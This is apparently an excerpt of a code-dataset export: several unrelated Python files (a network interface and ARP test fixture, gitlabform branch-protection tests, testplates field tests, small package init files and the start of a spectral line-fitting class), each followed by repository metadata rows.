"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 36,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"wccp_redirect_exclude": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"multicast_groups": [
"224.0.0.2",
"224.0.0.5",
"224.0.0.6"
]
},
"Ethernet2/10.12": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-down/link-down/admin-down",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 0,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 0,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.66.12.12/24": {
"route_preference": "0",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"ip_subnet": "10.66.12.0",
"ip": "10.66.12.12",
"secondary": False,
"route_tag": "0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 184,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"
},
"Ethernet2/12": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-down/link-down/admin-down",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 0,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 0,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.66.12.12/24": {
"ip": "10.66.12.12",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"secondary": False,
"ip_subnet": "10.66.12.0"
},
"unnumbered": {
"interface_ref": "Ethernet2/10.12"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 47,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"}
}
Arp_info = {
'interfaces': {
'Ethernet1/1': {
'ipv4': {
'neighbors': {
'10.1.3.5': {
'ip': '10.1.3.5',
'link_layer_address': 'aaaa.bbbb.cccc',
'origin': 'static'}
}
}
},
'Ethernet1/1.1': {
'ipv4': {
'neighbors': {
'192.168.4.2': {
'ip': '192.168.4.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic'}
}
}
},
'Ethernet1/1.2': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'ip': '192.168.154.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic'}
}
}
},
'Ethernet1/1.4': {
'ipv4': {
'neighbors': {
'192.168.106.2': {
'ip': '192.168.106.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic'}
}
}
},
'Ethernet1/2.1': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'ip': '192.168.154.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic'}
}
}
},
'Ethernet1/2.2': {
'ipv4': {
'neighbors': {
'192.168.51.2': {
'ip': '192.168.51.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic'}
}
}
},
'Ethernet1/2.4': {
'ipv4': {
'neighbors': {
'192.168.9.2': {
'ip': '192.168.9.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic'}
}
}
},
'Ethernet1/4.100': {
'ipv4': {
'neighbors': {
'10.51.1.101': {
'ip': '10.51.1.101',
'link_layer_address': '0000.71c7.6e61',
'origin': 'dynamic'}
}
}
},
'Ethernet1/4.101': {
'ipv4': {
'neighbors': {
'10.154.1.101': {
'ip': '10.154.1.101',
'link_layer_address': '0000.71c7.75c1',
'origin': 'dynamic'}
}
}
},
'Ethernet1/4.200': {
'ipv4': {
'neighbors': {
'10.76.1.101': {
'ip': '10.76.1.101',
'link_layer_address': '0000.0068.ce6f',
'origin': 'dynamic'}
}
}
},
'Ethernet2/1': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'Ethernet2/10.12': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'Ethernet2/11': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'Ethernet2/12': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'loopback0': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'mgmt0': {
'ipv4': {
'neighbors': {
'10.1.7.1': {
'ip': '10.1.7.1',
'link_layer_address': '0012.7f57.ac80',
'origin': 'dynamic'},
'10.1.7.250': {
'ip': '10.1.7.250',
'link_layer_address': '0050.5682.7915',
'origin': 'dynamic'},
'10.1.7.253': {
'ip': '10.1.7.253',
'link_layer_address': '0050.56a4.a9fc',
'origin': 'dynamic'}
}
}
}
},
'statistics': {
'entries_total': 12,
'in_drops': 28218,
'in_replies_pkts': 6582,
'in_requests_pkts': 22632,
'in_total': 0,
'incomplete_total': 0,
'out_drops': 0,
'out_gratuitous_pkts': 58,
'out_replies_pkts': 998,
'out_requests_pkts': 2102,
'out_total': 3158}
} | 45.672194 | 75 | 0.36194 | 2,447 | 35,807 | 4.955456 | 0.118512 | 0.031667 | 0.034306 | 0.029688 | 0.806696 | 0.791687 | 0.780059 | 0.764885 | 0.757546 | 0.706004 | 0 | 0.094608 | 0.535957 | 35,807 | 784 | 76 | 45.672194 | 0.635171 | 0.001061 | 0 | 0.661499 | 0 | 0 | 0.354129 | 0.163978 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.007752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
19afebcb2359181c41d4d21d834f4df4d2e3fcbf | 158 | py | Python | exp/views/__init__.py | enrobyn/lookit-api | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | [
"MIT"
] | null | null | null | exp/views/__init__.py | enrobyn/lookit-api | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | [
"MIT"
] | null | null | null | exp/views/__init__.py | enrobyn/lookit-api | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | [
"MIT"
] | null | null | null | from exp.views.user import * # noqa
from exp.views.study import * # noqa
from exp.views.dashboard import * # noqa
from exp.views.video import * # noqa
| 19.75 | 41 | 0.702532 | 24 | 158 | 4.625 | 0.375 | 0.252252 | 0.432432 | 0.459459 | 0.594595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196203 | 158 | 7 | 42 | 22.571429 | 0.874016 | 0.120253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
273ae5e299ae3e321d4a60e68b9fc616d964321b | 13,158 | py | Python | gitlabform/gitlabform/test/test_branches.py | KrystianOcado/gitlabform | 94066206542c8457bb28a34b3f83ae0cd015fd6f | [
"MIT"
] | null | null | null | gitlabform/gitlabform/test/test_branches.py | KrystianOcado/gitlabform | 94066206542c8457bb28a34b3f83ae0cd015fd6f | [
"MIT"
] | null | null | null | gitlabform/gitlabform/test/test_branches.py | KrystianOcado/gitlabform | 94066206542c8457bb28a34b3f83ae0cd015fd6f | [
"MIT"
] | null | null | null | import pytest
from gitlabform.gitlabform import GitLabForm
from gitlabform.gitlabform.test import create_group, create_project_in_group, get_gitlab, create_readme_in_project, \
GROUP_NAME
PROJECT_NAME = 'branches_project'
GROUP_AND_PROJECT_NAME = GROUP_NAME + '/' + PROJECT_NAME
@pytest.fixture(scope="module")
def gitlab(request):
gl = get_gitlab()
create_group(GROUP_NAME)
create_project_in_group(GROUP_NAME, PROJECT_NAME)
create_readme_in_project(GROUP_AND_PROJECT_NAME) # in master branch
branches = ['protect_branch_but_allow_all', 'protect_branch_and_disallow_all',
'protect_branch_and_allow_merges', 'protect_branch_and_allow_pushes',
'protect_branch_and_allow_merges_access_levels', 'protect_branch_and_allow_pushes_access_levels',
'protect_branch']
for branch in branches:
gl.create_branch(GROUP_AND_PROJECT_NAME, branch, 'master')
def fin():
# delete all created branches
for branch_to_delete in branches:
gl.delete_branch(GROUP_AND_PROJECT_NAME, branch_to_delete)
request.addfinalizer(fin)
return gl # provide fixture value
protect_branch_but_allow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_but_allow_all:
protected: true
developers_can_push: true
developers_can_merge: true
"""
protect_branch_and_disallow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_disallow_all:
protected: true
developers_can_push: false
developers_can_merge: false
"""
mixed_config = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: true
developers_can_push: false
developers_can_merge: true
protect_branch_and_allow_pushes:
protected: true
developers_can_push: true
developers_can_merge: false
"""
unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: false
protect_branch_and_allow_pushes:
protected: false
"""
mixed_config_with_access_levels = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges_access_levels:
protected: true
push_access_level: 0
merge_access_level: 30
unprotect_access_level: 40
'*_allow_pushes_access_levels':
protected: true
push_access_level: 30
merge_access_level: 30
unprotect_access_level: 40
"""
mixed_config_with_access_levels_update = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges_access_levels:
protected: true
push_access_level: 0
merge_access_level: 40
unprotect_access_level: 40
'*_allow_pushes_access_levels':
protected: true
push_access_level: 40
merge_access_level: 40
unprotect_access_level: 40
"""
mixed_config_with_access_levels_unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges_access_levels:
protected: false
'*_allow_pushes_access_levels':
protected: false
"""
config_protect_branch_with_old_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: true
developers_can_push: true
developers_can_merge: true
"""
config_protect_branch_with_new_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: true
push_access_level: 0
merge_access_level: 40
unprotect_access_level: 40
"""
config_protect_branch_unprotect = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: false
"""
config_unprotect_branch_with_old_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: false
developers_can_push: true
developers_can_merge: true
"""
config_unprotect_branch_with_new_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: false
push_access_level: 0
merge_access_level: 40
unprotect_access_level: 40
"""
class TestBranches:
def test__protect_branch_but_allow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_but_allow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_but_allow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
def test__protect_branch_and_disallow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_and_disallow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_disallow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is False
def test__mixed_config(self, gitlab):
gf = GitLabForm(config_string=mixed_config,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is True
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is False
gf = GitLabForm(config_string=unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is False
def test__mixed_config_with_new_api(self, gitlab):
gf = GitLabForm(config_string=mixed_config_with_access_levels,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 30
assert branch['unprotect_access_levels'][0]['access_level'] is 40
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, '*_allow_pushes_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 30
assert branch['merge_access_levels'][0]['access_level'] is 30
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=mixed_config_with_access_levels_update,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, '*_allow_pushes_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 40
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=mixed_config_with_access_levels_unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges_access_levels')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes_access_levels')
assert branch['protected'] is False
def test_protect_branch_with_old_api_next_update_with_new_api_and_unprotect(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
gf = GitLabForm(config_string=config_protect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=config_protect_branch_unprotect,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
def test_protect_branch_with_new_api_next_update_with_old_api_and_unprotect(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=config_protect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
gf = GitLabForm(config_string=config_protect_branch_unprotect,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
def test_unprotect_when_the_rest_of_the_parameters_are_still_specified_old_api(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
gf = GitLabForm(config_string=config_unprotect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
def test_unprotect_when_the_rest_of_the_parameters_are_still_specified_new_api(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=config_unprotect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
| 34.809524 | 121 | 0.715382 | 1,649 | 13,158 | 5.223772 | 0.049727 | 0.09055 | 0.074878 | 0.094846 | 0.926747 | 0.884839 | 0.856977 | 0.839331 | 0.825401 | 0.772347 | 0 | 0.009815 | 0.210214 | 13,158 | 377 | 122 | 34.901857 | 0.819092 | 0.005016 | 0 | 0.792079 | 0 | 0 | 0.392421 | 0.149373 | 0 | 0 | 0 | 0 | 0.165017 | 1 | 0.033003 | false | 0 | 0.009901 | 0 | 0.049505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2749b13d547dd68da8191f62ac4d18ddc8edc2d9 | 3,634 | py | Python | tests/test_base/test_mapping.py | kprzybyla/testplates | 156a373d9a0818c6074ec8d622d6ef1f867eafd3 | [
"MIT"
] | null | null | null | tests/test_base/test_mapping.py | kprzybyla/testplates | 156a373d9a0818c6074ec8d622d6ef1f867eafd3 | [
"MIT"
] | null | null | null | tests/test_base/test_mapping.py | kprzybyla/testplates | 156a373d9a0818c6074ec8d622d6ef1f867eafd3 | [
"MIT"
] | null | null | null | from typing import Final
from resultful import unwrap_success
from hypothesis import (
given,
strategies as st,
)
from testplates import (
struct,
init,
field,
passthrough_validator,
MISSING,
)
KEY: Final[str] = "key"
# noinspection PyTypeChecker
@given(value=st.integers())
def test_value_access_in_required_field(value: int) -> None:
@struct
class Template:
key = field()
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == MISSING
assert Template.key.validator is validator
assert Template.key.is_optional is False
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert template.key == value
assert template[KEY] == value
# noinspection PyTypeChecker
@given(value=st.integers(), default=st.integers())
def test_value_access_in_required_field_with_default_value(value: int, default: int) -> None:
@struct
class Template:
key = field(default=default)
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == default
assert Template.key.validator is validator
assert Template.key.is_optional is False
assert (result_value := init(Template, key=value))
assert (result_default := init(Template))
template_value = unwrap_success(result_value)
template_default = unwrap_success(result_default)
assert template_value.key == value
assert template_value[KEY] == value
assert template_default.key == default
assert template_default[KEY] == default
# noinspection PyTypeChecker
@given(value=st.integers())
def test_value_access_in_optional_field(value: int) -> None:
@struct
class Template:
key = field(optional=True)
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == MISSING
assert Template.key.validator is validator
assert Template.key.is_optional is True
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert template.key == value
assert template[KEY] == value
# noinspection PyTypeChecker
@given(value=st.integers(), default=st.integers())
def test_value_access_in_optional_field_with_default_value(value: int, default: int) -> None:
@struct
class Template:
key = field(default=default, optional=True)
validator = unwrap_success(passthrough_validator())
assert Template.key.name == KEY
assert Template.key.default == default
assert Template.key.validator is validator
assert Template.key.is_optional is True
assert (result_value := init(Template, key=value))
assert (result_default := init(Template))
template_value = unwrap_success(result_value)
template_default = unwrap_success(result_default)
assert template_value.key == value
assert template_value[KEY] == value
assert template_default.key == default
assert template_default[KEY] == default
# noinspection PyTypeChecker
@given(value=st.integers())
def test_len(value: int) -> None:
@struct
class Template:
key = field()
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert len(template) == 1
# noinspection PyTypeChecker
@given(value=st.integers())
def test_iter(value: int) -> None:
@struct
class Template:
key = field()
assert (result := init(Template, key=value))
template = unwrap_success(result)
assert list(iter(template)) == [KEY]
| 26.143885 | 93 | 0.713814 | 436 | 3,634 | 5.788991 | 0.107798 | 0.143819 | 0.134707 | 0.082409 | 0.918384 | 0.918384 | 0.918384 | 0.918384 | 0.897781 | 0.850238 | 0 | 0.000339 | 0.188222 | 3,634 | 138 | 94 | 26.333333 | 0.855254 | 0.044304 | 0 | 0.734043 | 0 | 0 | 0.000866 | 0 | 0 | 0 | 0 | 0 | 0.404255 | 1 | 0.06383 | false | 0.053191 | 0.042553 | 0 | 0.234043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
27af93ffb27ef5803406f96a507fe854815f489c | 181 | py | Python | NonCipher/__init__.py | NotStatilko/NonCipher | e3ba53328ffae039e24b7d4b646649b713383313 | [
"Apache-2.0"
] | 7 | 2019-06-04T19:08:19.000Z | 2019-11-07T17:00:24.000Z | NonCipher/__init__.py | NotStatilko/NonCipher | e3ba53328ffae039e24b7d4b646649b713383313 | [
"Apache-2.0"
] | 6 | 2019-06-03T18:30:46.000Z | 2021-05-02T21:45:16.000Z | NonCipher/__init__.py | NotStatilko/NonCipher | e3ba53328ffae039e24b7d4b646649b713383313 | [
"Apache-2.0"
] | null | null | null | from NonCipher.NonCipher import NonCipher
from NonCipher.NonCipher import get_hash_of
from NonCipher.NonCipher import TRY_TO_DECRYPT
from NonCipher.NonCipher import __version__
| 36.2 | 47 | 0.867403 | 24 | 181 | 6.208333 | 0.416667 | 0.348993 | 0.590604 | 0.751678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110497 | 181 | 4 | 48 | 45.25 | 0.925466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
fd961f1b1a794ef2d561e0a90795ed5d37c06214 | 49,598 | py | Python | galaxy/python/LineFittingLibrary.py | AndresSixtos/pyeBOSS | 4750908c8bc409633bef8f790133e3a1f3f0c9e4 | [
"CC0-1.0"
] | 1 | 2017-05-23T13:03:27.000Z | 2017-05-23T13:03:27.000Z | galaxy/python/LineFittingLibrary.py | AndresSixtos/pyeBOSS | 4750908c8bc409633bef8f790133e3a1f3f0c9e4 | [
"CC0-1.0"
] | null | null | null | galaxy/python/LineFittingLibrary.py | AndresSixtos/pyeBOSS | 4750908c8bc409633bef8f790133e3a1f3f0c9e4 | [
"CC0-1.0"
] | 2 | 2017-09-26T11:17:30.000Z | 2021-09-14T06:09:18.000Z | """
.. class:: LineFittingLibrary
.. moduleauthor:: Johan Comparat <johan.comparat__at__gmail.com>
This class contains a variety of function to fit emission or absorption lines in galaxy spectra.
"""
from scipy.optimize import curve_fit
import numpy as n
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as p
from scipy.interpolate import interp1d
from scipy.integrate import quad
# Location of the emission lines of interest:
import astropy.constants as cc
c=cc.c.value # speed of light
#from lineList import *
class LineFittingLibrary:
"""
	Loads the environment needed to fit lines :
* Gaussian line model
* Lorentzian line model
* pseudoVoigt line model
		* conversion from AB magnitude to flux : fnu and flambda
:param dV: the default value (def: -9999.99)
"""
def __init__(self,dV=-9999.99):
self.dV=dV # default value put in the catalogs
# Line models
self.gaussianLine=lambda aa,sigma,F0,a0,continu : continu + F0*(n.e**( -(aa-a0)**2. / (2.*sigma**2.)))/ (abs(sigma)*(2.*n.pi)**0.5)
self.gaussianLineNC=lambda aa,sigma,F0,a0 : F0*(n.e**(-(aa-a0)**2./ (2.*sigma**2.) ))/(abs(sigma)*(2.*n.pi)**0.5)
self.lorentzLine=lambda aa,gamma,F0,a0,continu : continu + F0 * abs(gamma) / (n.pi* ((aa-a0)**2 +gamma**2))
self.pseudoVoigtLine=lambda aa,fwhm,F0,a0,continu,sh : continu + F0*abs(sh)/(1+ ((aa-a0) /(fwhm/2.))**2.)+F0*(1-abs(sh))*n.e**( -n.log(2)* ((aa-a0)/(fwhm/2.))**2.)
# conversion magnitude flux
self.fnu = lambda mAB : 10**(-(mAB+48.6)/2.5) # erg/cm2/s/Hz
self.flambda= lambda mAB, ll : 10**10 * c * self.fnu(mAB) / ll**2. # erg/cm2/s/A
def integrateMAG(self,wl,spec1d,err1d,filt,xmin=5000.,xmax=7500.):
"""
Integrates a spectrum over a filter curve.
:param wl: wavelength (array)
:param spec1d: flux, f lambda convention (array)
:param err1d: flux error (array)
:param filt: filter curve (interpolation 1d)
:param xmin: lower integration boundary (Angstrom)
:param xmax: higher integration boundary (Angstrom)
returns :
* integral of filter curve
* integral of spec1d
* integral of spec1d * filter curve
* integral of (spec1d + err1d) * filter curve
* integral of (spec1d - err1d) * filter curve
"""
filtTp=filt(wl)
Lfilt=quad(filt,xmin,xmax,limit=500000)[0]
toInt=interp1d(wl,spec1d)
Lspec=quad(toInt,xmin,xmax,limit=500000)[0]
